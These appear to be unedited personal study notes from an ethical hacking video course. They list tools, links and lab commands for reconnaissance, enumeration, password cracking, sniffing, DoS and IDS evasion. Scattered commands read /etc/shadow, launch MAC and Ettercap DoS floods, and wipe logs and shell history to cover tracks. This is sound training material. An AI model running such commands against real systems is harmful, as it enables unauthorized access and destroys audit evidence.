Ethical Hacking : Notes

Ethical Hacking Notes

Disclaimer:

• This document contains unedited notes and has not been formally proofread.

• The information provided in this document is intended to provide a basic understanding of certain technologies.

• Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.

• Some websites and software may be flagged as malware by antivirus programs.

• The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.

• The document is not a substitute for professional advice or expert analysis and should not be used as such.

• The document does not constitute an endorsement or recommendation of any particular technology, product, or service.

• The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.

• The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.

• The author reserve the right to update or change the information contained in this document at any time without prior notice.

• Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.

• It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.

• Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.

• It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.

• It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.

• It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

Reference : https://www.linkedin.com/learning/

Contents

Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock Chapter 6: Ethical Hacking: System Hacking, By: Lisa Bock Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock Chapter 9: Ethical Hacking: Social Engineering By: Lisa Bock Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore Chapter 13: Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore

***********************************************************************************************************

Technology: Security

Become an Ethical Hacker

Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.

Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock

** attacks types

1. Passive

- Sniffing

- Port scanning

2. Active

- Release malware

- Launch DDoS

** Standards:

- PCI DSS

- HIPAA

- SOX

- GDPR

- COBIT framework

** Burst Attack or DoS

Reconnaissance - gather information about you.

3 Basics for a Org to contain cyber attack

1. Technical controls - Detect & Protect

2. Administrative

3. People

VLANS

NAT - N/w address translation

Spam filters, packet shapers & honey-spots

TOGAF - The Open Group Architecture Framework

ITIL - Information Technology Infrastructure Library

COBIT - Control Objectives for Information and Related Technology

SOX - Sarbanes-Oxley (SOX) act

SOX - section 301 & 404 = Indirectly deal with Information assurance and Data integrity

Penetration testing : can include N/w devices, email, hosts, wireless, applications, and websites.

FISMA - Federal Information Security Management Act

Vulnerability Scanning Tool

1. Tenable

Ethical Hacking

Means -

- what is derived from the information

- what can be planned to devise counter measures

Planned Five Phases approach

- Reconnaissance

- Scanning

- Gaining access

- Maintaining access

- Covering Tracks

******************************************************************************

Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock

Finding Information everywhere:-

Public resources - Websites, directories, email, job sites, Social websites.

Google Hacking database:

https://www.exploit-db.com/google-hacking-database

HTTrack Website Copier

https://www.httrack.com/

Montastic is free for open source software

https://www.montastic.com/

StatusOK

Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.

https://github.com/sanathp/statusok

https://www.shodan.io/

Shodan is the world's first search engine for Internet-connected devices.

Email Header look up

https://mxtoolbox.com/

 Metagoofil is an information gathering tool designed for extracting metadata of public documents

https://www.kali.org/tools/metagoofil/

FOCA (Fingerprinting Organizations with Collected Archives)

https://github.com/ElevenPaths/FOCA

theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.

https://github.com/laramies/theHarvester

https://www.kali.org/tools/theharvester/

DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.

https://dmarc.org/

The Anti Hacker Alliance™ fights against Hackers

https://anti-hacker-alliance.com/

tracert google.com

pathping google.com

Network Tools: The Trusted Free Online

https://network-tools.com/

dig Command in Linux

https://www.geeksforgeeks.org/dig-command-in-linux-with-examples/

https://toolbox.googleapps.com/apps/main/

https://dnsdumpster.com/

https://who.is/

ip logger : can track geo location using ip logger URL

https://iplogger.org/

******************************************************************************

Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock

Ports 1 - 1023

21 FTP

22 SSH

53 Domain Name system

80 HTTP

88 Kerberos

Ports from 1024-49151 are registered

3389 - Remote desktop Protocol (RDP)

Vulnerability Scan

Firewall response in port scanning:

open means listening

Closed means denying

No reply means in stealth mode

Tools in Kali Linux:

Netcat and Nmap

DMitry

Curl

Armitage

Banner Grabbing: is done to get

operating system

Open ports and service running

To Prevent Banner Grabbing:

Mask or disable the web server

Hide file extensions on services

Disable unnecessary service

SSDP: Simple Service Discovery Protocol

https://www.spiceworks.com/free-network-monitoring-management-software/

NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.

https://www.netresec.com/?page=NetworkMiner

FING App : https://www.fing.com/products/fing-app

Net Scan by Nick Circelli

IP Tools: WiFi Analyzer by AmazingByte

Nikto :

Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.

https://www.kali.org/tools/nikto/

Staying anonymous:

1. Use private browsing

2. privacy badger

3. use password manager

4. use duckduck go

5. use VPN

6. temp email

Stay anonymous in Mobile

1. Don't use phone

2. don't use google

3. disable gps

4. use waze

Onion Routing TOR

1. Don't torrent

2. don't install or enable plugins

3. use only https

4. don't open documents

TOR flow network

https://torflow.uncharted.software/

Proxy Chain: Tools

1. Proxy swicher

2. Proxifier

3. Proxy workbench

Kali Linux:

sudo apt-get install tor

sudo apt-get install proxychains

SSH tunnels:

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

https://www.putty.org/

***************************************************************************

Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore

Enumeration is Identifying -

1. Username

2. System addresses

3. Network resources

4. Shares

5. Other targets

Before Vulnerable testing

- Extract usernames

- Gather host information via null sessions

- port enumeration

- user account enumeration

- special protocol enumeration

Approaches

- Local host enumeration

- remote host enumeration

- internet enumeration

- port and services enumeration

Useful service

Port 53 - DNS Domain Name System

Port 25 - SMTP Simple Mail transfer Protocol

Port 135 - RPC Remote Procedure calls

Port 139 - NetBIOS

Port 161 - SNMP simple network management Protocol

Port 389 - LDAP Lightweight Directory Protocol

Port 445 - SMB Server message Block

┌──(kali㉿kali)-[~]

└─$ echo $UID

┌──(kali㉿kali)-[~]

└─$ cat /etc/passwd |more

┌──(kali㉿kali)-[~]

└─$ sudo cat /etc/sudoers

┌──(kali㉿kali)-[~]

└─$ getent group sudo

How to run in root mode from User mode 

┌──(kali㉿kali)-[~]

└─$ sudo su              

┌──(root㉿kali)-[/home/kali]

└─# echo $UID

0                                                                                                            

┌──(root㉿kali)-[/home/kali]

└─# Exit 

┌──(kali㉿kali)-[~]

└─$ 

NetBIOS

• NetBIOS name service - port 137 UDP

• Datagram Distribution service - PORT 138 UDP

• NetBIOS over TCP/IP - PORT 139 TCP

SMB

• SAMBA is a linux implementation of SMB

DCE Distributed Computing Environment

• RPC Remote Procedure Call

Local-Host Enumeration: 

Profiling a Linux Metasploitable 2 

$ cat /proc/version 

$ cat /etc/*-release

$ cat /proc/cpuinfo

$ df -a

$ df -h

$ cat /etc/shells

List of user names

• $ cat /etc/passwd

Password with Hash 

• $ sudo cat /etc/shadow

$ pinky

$ w

$ who -a

Profiling a windows Host

Download PsTools:-  https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

Windows Terminal

Downloads> cd .\PSTools\

Downloads\PSTools> .\PsInfo.exe

Downloads\PSTools> .\PsInfo.exe -d

Downloads\PSTools> .\PsInfo.exe -s

Downloads\PSTools> .\pslist.exe

Downloads\PSTools> .\pslist.exe -t

Downloads\PSTools> .\pslist.exe -x

Downloads\PSTools> .\psloglist.exe -n 10

Downloads\PSTools> .\PsLoggedon.exe

Downloads\PSTools> .\PsService.exe

Downloads\PSTools> .\PsService.exe security Eventsystem

Downloads\PSTools> .\PsService.exe depend Eventsystem

Kali Linux :- 

Getting details from metasploitable-2 

smbmap -u '' -p '' -H 10.0.2.4 -R

sudo netstat -i 

Get UDP open ports only

nmap -sU 10.0.2.4 

Get TCP open ports only 

nmap -PS 10.0.2.4

SMB from Linux:-

nbtscan

┌──(kali㉿kali)-[~]

└─$ nbtscan -h

┌──(kali㉿kali)-[~]

└─$ sudo nbtscan -v -s : 10.0.2.0/24 

─$ sudo nbtscan -rv 10.0.2.0/24

nmap

┌──(kali㉿kali)-[~]

└─$ ls /usr/share/nmap/scripts 

┌──(kali㉿kali)-[~]

└─$ sudo nmap --script smb-os-discovery 10.0.2.4

┌──(kali㉿kali)-[~]

└─$ sudo nmap --script smb-enum-users 10.0.2.4

enum4linux

┌──(kali㉿kali)-[~]

└─$ enum4linux -U 10.0.2.4

┌──(kali㉿kali)-[~]

└─$ enum4linux -S 10.0.2.4

         

rpcclient                                                                                                         

┌──(kali㉿kali)-[~]

└─$ rpcclient -h

https://www.mitec.cz/netscan.html

https://www.softperfect.com/products/networkscanner/

https://www.ireasoning.com/mibbrowser.shtml

WMI

Understanding how to enumerate WMI is useful both for offensive and defensive activities.

whatweb

┌──(kali㉿kali)-[~]

└─$ whatweb 10.0.2.4

┌──(kali㉿kali)-[~]

└─$ whatweb 10.0.2.0/24 --no-errors | grep -v Unassigned

nikto

┌──(kali㉿kali)-[~]

└─$ nikto -h 10.0.2.4   

zaproxy

sudo apt install zaproxy

https://www.kali.org/tools/zaproxy/

gobuster

https://www.kali.org/tools/gobuster/

Tracing Routes 

┌──(kali㉿kali)-[~]

└─$ sudo traceroute -I 67.3.11.1  

Enumeration Cloud 

AWS has its own CLI (command line input) 

NetScanTools Basic Edition

https://www.netscantools.com/nstbasicmain.html

LDAP 

https://sourceforge.net/projects/ldapadmin/

Telent 

┌──(kali㉿kali)-[~]

└─$ telnet 10.0.2.4

***********************************************************************************************************

Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock

Managing Org Risk: 

Risk = Threats * Vulnerabilities 

Zero-Day Attack

Vulnerabilities found in wild -> Unaware = Public + Vendor 

Then after the period Vendor is aware -> Unaware = Public

Vendor  released patches -> aware = Public

Assessing Vulnerabilities

• Network scanning

• 2 types 

• Information systems = DBMS, software

• Information technologies = Hardware, n/w devices

• How run Vul. scan 

• Unauthenticated scan = No user/pass, basic config, can miss many vuln. 

• Authenticated scan = clone environment system, valid user/pass, detailed scan

Lifecycle for Vuln management

• Baseline

• Assess Vuln = Plan (compliance req.; Tools- Ports cans, n/w scans, web app scans.)

• Assess Risk

• Remediate = Mitigate the vuln. 

• Verify = retest 

• Monitor = continuous monitoring 

Threat Modeling 

Used to create VM of the entire system along with potential points and a list of possible attacks 

Data Breach : 

https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/#bysensitivity

Web-based User Feedback System

https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf

Using STRIDE, listed here are some of the threats possible against this system, organized by class of threat. 

Analyzing Vulnerabilities 

NIST SP 800-30, Page 78

https://www.nist.gov/privacy-framework/nist-sp-800-30

NIST: Common Vulnerability Scoring System Calculator [CVSS]

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

CVE: Common Vulnerabilities and Exposures

Each CVE has id and score is derived from metrics CVSS

Current CVSS Score Distribution For All Vulnerabilities

https://www.cvedetails.com/

https://www.cvedetails.com/vulnerability-list.php?vendor_id=0&product_id=0&version_id=0&page=22&hasexp=0&opdos=0&opec=1&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2022&cweid=0&order=2&trc=2105&sha=3ecb9c2942e59ed03bfff2cd27fb2aa98519a183

Learn Vulnerability scan from Web

https://www.hacker101.com/start-here

https://ctf.hacker101.com/auth/login

https://www.hackerone.com/

Virtual Machine Image : 

https://www.osboxes.org/

Kali linux

Commando VM: 

https://www.mandiant.com/resources/commando-vm-windows-offensive-distribution

Github link:-

https://github.com/mandiant/commando-vm

Nikto : Built into Kali linux

┌──(kali㉿kali)-[~]

└─$ nslookup scanme.nmap.org

┌──(kali㉿kali)-[~]

└─$ nikto -h 45.33.32.156  

Fuzz Testing 

A black box method that floods a system with inputs

Kali linux - OWASP ZAP

LAN

Defending the LAN

Spoofing:

Man In The Middle Attack

ARP spoofing 

MAC spoofing 

Cisco Discovery Protocol Attack

VLAN hopping attack

DHCP attack

Yersinia attack Tool: 

https://www.kali.org/tools/yersinia/

┌──(kali㉿kali)-[~]

└─$ sudo yersinia -G

Attacks can be launched from yersinia. 

Monitoring Tools: 

https://www.nagios.org/

https://www.tenable.com/products/nessus

https://www.gfi.com/

https://sectools.org/

Firewalls and HIDS

Endpoint firewall examples- ZoneAlarm, ESET, and Norton Personal Firewall

Intrusion detection:

Intrusion must learn the system, can monitor the host for suspicious activities 

Examples- Symantec endpoint protection, McAfee host intrusion Prevention, Suricata. 

https://help.eset.com/eis/15/en-US/

Hack a website Exercise:- 

https://hbh.sh/home

***********************************************************************************************************

Chapter 6: Ethical Hacking: System Hacking,  By: Lisa Bock

APT Advanced persistent Threat

NTLM New Technology LAN Manager

Kerberos

PAM Pluggable Authentication Modules

SASL Simple Authentication and Security Layer

Gaining Access:- 

SAM Security Account Manager 

Random Password Manager:- 

https://www.passwordrandom.com/

Dictionary Attack

Brute Force Attack

Hybrid Attack

Password cracking Tools:

 L0phtCrack 7.2.0 has been released as an open source project

https://gitlab.com/l0phtcrack/l0phtcrack/-/releases

Ophcrack is a free Windows password cracker based on rainbow tables. 

https://ophcrack.sourceforge.io/

John the Ripper

Cain and Abel

Secure Hash Algorithms used for hashing the passwords

Rainbow crack:-

http://project-rainbowcrack.com/

Create  the Hash format for password

https://www.fileformat.info/tool/hash.htm

Online Reverse Hash Lookup

http://reverse-hash-lookup.online-domain-tools.com/

http://www.md5.cz/

Escalating Privileges

• Horizontal

• Vertical  

Privilege escalation takes advantage of vulnerability and tries to gain administrator access.

 

Password Resetting Tool:

https://trinityhome.org/

https://www.password-changer.com/index.html

simda bot free ip scanner

https://checkip.kaspersky.com/

Recognizing Spyware

Categories of Malware

• Spyware

• Viruses

• Worms

• Trojans

• Rootkits

• Adware

Block Third party cookies always

Anti Spyware Tools: 

Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.

https://www.safer-networking.org/products/spybot-identity-monitor/

https://www.safer-networking.org/free-download/

Keyloggers: 

https://www.elitekeyloggers.com/

Help Your Kids by Watching Their Back

https://www.refog.com/

Objective-see: 

 non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference

https://objective-see.org/

malwarebytes

https://www.malwarebytes.com/keylogger

Hiding in Plain Sight

Creating Hidden content 

desktop> notepad temp.txt:secret.txt

To display hidden content:- 

desktop>more < temp.txt:secret.txt

Steganography Tools: these are obsolete 

• MP3Stego

• S-Tools

• OpenPuff

Update : Local Security Policy in windows

Local policies -> Audit Policy-> audit account logon events -> enable

Covering Tracks:

• For Linx: Metasploit meterpreter > clearev

• Open log files stored in /var/log directory

• In BackTrack: kwrite /var/log/messages

• Erase command history 

• Export HISTSIZE=0

• Open Event Logger and select clear log 

***********************************************************************************************************

Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore

Introduction to Malware

Improve the windows startup service: Regedit: - Then delete unwanted register key - Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs

ROOTKIT

Zeus malware:

Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.

• Citadel (malware)

Virus Construction Kit

2 types 

• GUI interface

• Configuration file

SpyEye Builder 

FireCrypt 

Trojan Development Kit - TDK

Reference: Transcriptase–Light: A Polymorphic Virus Construction Kit

https://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1513&context=etd_projects

MITRE ATT&CK

is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.

https://attack.mitre.org/

Malware Detection

IOC Indicator of Compromise

IOA Indicator of Attack

IOC Bucket 

is a free community driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way. 

IOC Bucket

OASIS OPEN:

https://www.oasis-open.org/

ADS Anomaly Detection System 

Sandboxing Malware

Some enterprise products as examples 

https://www.sonicwall.com/products/firewalls/

Malware That changes

• Polymorphic

• Metamorphic

Ransomware 

WannaCry

• Delivery via Phishing, via port 445 - configured for file sharing

APT Defenses: advanced persistent threat 

Targeted cyberattacks logbook

Click on the each marware and get more information 

SODIN malware:

Exploits using CVE-2019-2725/9

Dropper installs w32.sodin malware

Privilege escalation using CVE-2018-8453 & gains full system privileges

BlackEnergy 2 & 3: Malware - attacks industrial control workstations 

Encrypted Rootkill payload 

GreyEnergy Malware

Reverse Engineering Malware

https://zeltser.com/mastering-4-stages-of-malware-analysis/

https://cuckoosandbox.org/

VirusShare.com is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code

https://virusshare.com/about

malware-traffic-analysis

A source for packet capture (pcap) files and malware samples

https://www.malware-traffic-analysis.net/

Automated Malware analysis

Hybrid Analysis 

This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 

BlackEnergy /2 /3 - Malware - attacks industrial control workstations 

Encrypted Rootkill payload 

Help file in Russian

It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.

BlackEnergy 2

• Kernel mode driver

• Process injection

• Privilege escalation based on ms08-025

BlackEnergy 3

• 2015 Ukraine power grid attacks

• Then gave into GreyEnergy Malware

Analyzing Packers

UPX

UPX is a free, portable, extendable, high-performance executable packer for several executable formats.

Ghidra : tools developed by NSA's

A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission

***********************************************************************************************************

Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock

Sniffing  or Packet Analysis

Tools

• Wireshark

Npcap 

• Comes from nmap for windows along with wireshark.

Phases

• Gather

• Decode

• Display

• Analyze

• Is the traffic normal

• TCP flags

• Malware Signatures

• Traffic in clear text

• Router advertisements 

OSI Model

Frame

OSI model in wireshark 

Active Attacks:

• Denial of Service DoS

• Buffer overflow

• Password attack

Tapping in to Data Stream

• 2 basic types of ethernet environments

• Shared or hub based

• Switched network

Wireless

• 802.11b/g/n act like a hub

IPv4 Vs IPv6

MAC Attacks 

MACOF:

┌──(kali㉿kali)-[~]

└─$ sudo macof

Vulnerable protocols

• STP = Spanning Tree Protocol 

• Attacks

• DoS using BPDU Flood

• CDP = Cisco Discovery Protocol

• Attacks

• Send bogus CDP to other devices

• Flood CDP & cause a DoS

• DTP

• DHCP

• HRSP

• ISL

• VTP

• 802.1Q

• 802.1X

Macof Attack Defense

• Use switch port security

Macof Spoofing Defense

• Used in Man-in-the-middle attack

• Use Filtering trusted IP & MAC address

DHCP

DHCP process

• Discover

• Offer

• Request

• Acknowledge

VLAN Access Control List VACL

• Access control on the switch not the router

ARP

Ettercap

• Tool in Kali Linux

• Used in man in the middle attack

┌──(kali㉿kali)-[~]

└─$ ettercap -G

Old websites

• AsecuritySite:https://asecuritysite.com/ids

• arpalert.org: main page

• ArpON

DNS

To prevent DNS attacks

• Enable Cache locking

• 
  

Sniffing Tool and TEchniques 

Tools

• Android Software - tPacketCapture

Linux Tools

• Tcpdump

• Ettercap

• Dsniff

Windows - WhoFi

***********************************************************************************************************

Chapter 9: Ethical Hacking: Social Engineering  By: Lisa Bock

Social Engineering Techniques 

• Phone phishing

• Online recon

• Dumpster diving

• Shoulder surfing

• Simple persuasion

Catfishing

• Poses as love interest

• Lures you into a relationship 

Browser

• Privacy most important 

• TOR browser

Extensions or Addons 

• Auto update enabled 

Reputation Risk

• Use of social platform 

Information Collection 

• Identification Theft

• Report fake account in facebook

Penetration testing with social Engineering

• Phishing emails

• Dangerous websites 

• Fake Call 

Pentesting with SET - Social Engineering Toolkit

• Download the toolkit or use with kali linux

• SET - Crafts the bait

• Metasploit - creates the exploit

• 
  

The Social-Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) - TrustedSec 

https://www.trustedsec.com/

Spamhaus

• https://www.spamhaus.org/statistics/spammers/

Desktop File shredder File Shredder

• https://www.fileshredder.org/

***********************************************************************************************************

Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore

Understanding DoS

Tools

• Digital Attack Map

• https://www.digitalattackmap.com/

Attack Types:

• DoS

• DDoS

Network Based attacks

• TCP SYN flood 

• Smurf (ICMP) flood

• UDP flood

• ARP flood

• DNS reflection 

Wireless Attacks

• De-authentication

• Routing congestion

Application Attacks

• HTTP services

• FTP service

• SIP services

Infrastructure of DoS

Hping3 -h

┌──(kali㉿kali)-[~]

└─$ hping3 -h 

HPing3 Cheatsheet ≈ Packet Storm

https://packetstormsecurity.com/files/97414/HPing3-Cheatsheet.html

https://dl.packetstormsecurity.net/papers/general/hping3_cheatsheet_v1.0-ENG.pdf

Hyenae download | SourceForge.net

https://github.com/r-richter/hyenae

 Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant. 

LOIC Approach

https://github.com/NewEraCracker/LOIC

https://sourceforge.net/projects/loic/

Ettercap 

┌──(kali㉿kali)-[~]

└─$ ettercap -P list

Ettercap -TQP dos_attack

Ettercap -G

┌──(kali㉿kali)-[~]

└─$ service --status-all | more

ntpdos

Denial of service using NTP servers to amplify attacks

It appears someone is using an attack vector like this to DDOS CloudFlare

https://github.com/vpnguy-zz/ntpdos

GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers

Memcached

Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

https://memcached.org/

 Memcrashed-DDoS-Exploit

This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io

https://github.com/649/Memcrashed-DDoS-Exploit

GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API

Wireless DoS

Airmon-ng

https://www.aircrack-ng.org/doku.php?id=airmon-ng

┌──(kali㉿kali)-[~]

└─$ sudo airmon-ng

Application DoS

goldeneye

https://www.kali.org/tools/goldeneye/

GoldenEye is a HTTP DoS Test Tool. This tool can be used to test if a site is susceptible to Deny of Service (DoS) attacks. Is possible to open several parallel connections against a URL to check if the web server can be compromised.

OWASP Top Ten

https://owasp.org/www-project-top-ten/

Ransomware

Cryptolocker Ransomware

• Distributed by botnets

• Drops randomly generated name

• Inserts startup command into registry

• 

Post Encryption 

• Ransom Message displayed

• Countdown timer started

• If payment not received, files are deleted 

Paying Ransom

• Payment of the ransom is made using bitcoins. 

• Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards. 

• Once the victim pays the ransom, a transaction ID is provided. 

• The victim can then enter this into the Cryptolocker program that is running.

•  The private key is then sent to the victim, and the decryption process begins.

Mitigation Techniques

Mitigation by design

• Priority based servicing 

• Priority Management

• Discard low priority

• Aggregate based congestion control [ACC]

• Egress filtering

• Packet inspection

• Detect bad packets

• Ingress filtering 

• Malicious packet detection

• NEtwork context 

Operation Mitigation 

• IP address verification

• Source address spoofing

• Real Time detection

•  Real time traceback 

• 
  

• Rate limiting

• ACLs

• Detecting known malicious threats

• Characterizing normal

• Metrics to reflect normal boundaries 

• Detecting traffic anomalies

Repose

 is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.

https://repose.atlassian.net/wiki/spaces/REPOSE/overview

Project Shield

Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline

https://projectshield.withgoogle.com/landing

Peershark

https://github.com/pratiknarang/peershark

https://ieeexplore.ieee.org/document/9642767

https://www.ieee-security.org/TC/SPW2014/papers/5103a108.PDF

NIST

Resilient Interdomain Traffic Exchange:

BGP Security and DDoS Mitigation

https://csrc.nist.gov/publications/detail/sp/800-189/final

Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation

• 39 control plane and BGP security recommendations

• 26 DDoS mitigation recommendations

• 12 recommendations for source address validations

• 7 recommendations for port Filtering 

•  1 recommendations on rate limiting

• 6 recommendations on flow specification blackholing

IOT Distributed IDS

***********************************************************************************************************

Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore

Into Session Hijacking 

• Stateless HTTP

• Session IDs

• PHP session array

Websocketd

http://websocketd.com/

https://github.com/joewalnes/websocketd

Establishing Man in the Middle

• Web proxy

• ARP poisoning

• Malicious Wifi

Cookie hijacking 

Tampermonkey:-

https://www.tampermonkey.net/

https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en

Subterfuge-Framework /Framework for Man-In-The-Middle attacks 

https://github.com/Subterfuge-Framework/Subterfuge

ARP poisoning

Cain and Abel

https://sectools.org/tool/cain/

PUTTY

https://www.putty.org/

PuttyRider

Hijack Putty sessions in order to sniff conversation and inject Linux commands.

https://github.com/seastorm/PuttyRider

DNS Hijacking

Cloud hijacking 

API Key HIjack

Hijacking the Physical Worlds

Vehicle wiring Diagram

Parrot Drone

• UDP 5554- telemetry data

• TCP 5555- streaming video

• UDP 5556- flight commands

• UDP 5559- critical data

Acrylic Wi-Fi Home – WiFi Scanner

https://www.acrylicwifi.com/en/wlan-wifi-wireless-network-software-tools/wlan-scanner-acrylic-wifi-free/

Enhanced Kamkar attack

• Telnet connection

• Add firewall rule

• Laptop application to control drone

Photography Drone

• 2.4GHz radio control link

• XBee telemetry link

• 5.8GHz streaming video link

Telemetry Channel attacks 

• Detect all ZigBee station

• Delete the mac address and set attackers mac address

• Pair victim with attacker

***********************************************************************************************************

Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore

Firewall

Windows Firewall

• Windows Defender Firewall Properties 

• Public Profile

• Inbound connections = Block all connections

• Settings-> Customize -> allow unicast response = No {to safe from defense performance mark as NO} 

• Logging->Customize->

• Log Dropped packets = Yes

• Log Successful connections = yes

Windows DNS Log Analyser

https://support.moonpoint.com/reviews/software/windows/network/dns/WDLA/

Linux Firewall

iptables  

┌──(kali㉿kali)-[~]

└─$ sudo iptables -L -n -v

┌──(kali㉿kali)-[~]

└─$ cat /var/log/kern.log

Networking using GN3 

GNS3 : https://www.gns3.com/

All in one:- 

https://github.com/GNS3/gns3-gui/releases

• Tour of GN3

• Basic operation

• Routed network

• ASA secure enclave

Honeypots

• Target to lure attackers 

• Identify and prosecute

• Monitor and analyze

• Types of honey pots

• Low interaction 

• High interaction

• Honeynets

• sinkhole

https://www.honeynet.org/projects/

This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoc students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.

Protection from Intrusion

• Blacklist the websites

• Whitlist

• Just add the sites to be allowed

• This is easier than maintaining the blacklist 

Snort 

• Log and Alert output 

• alert_fast

• alert_full

• Default file /var/logs/snort/

• alert_syslog

Suricata

Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.

https://suricata.io/

Security Onion

Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others. 

